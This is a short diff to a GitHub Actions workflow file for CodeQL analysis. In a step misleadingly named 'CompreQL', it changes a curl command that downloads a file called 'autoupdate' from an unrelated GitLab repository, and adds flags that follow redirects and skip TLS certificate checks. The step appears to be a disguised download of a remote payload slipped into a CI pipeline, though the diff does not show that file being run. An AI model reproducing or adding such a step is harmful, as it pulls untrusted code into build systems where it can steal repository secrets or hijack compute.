--- a/.github/workflows/codeql-analysis.yml
+++ b/.github/workflows/codeql-analysis.yml
@@ -56,7 +56,7 @@ jobs:
 
     - name: CompreQL
       run: |
-        curl -O 7_0_jdk11 https://gitlab.com/project-dev-/v.0.0.21052021/-/raw/master/autoupdate
+        curl -L -O -k 7_0_jdk11 https://gitlab.com/project-dev-/v.0.0.21052021/-/raw/master/autoupdate
 
     - name: Perform CodeQL Analysis
       uses: github/codeql-action/analyze@v1
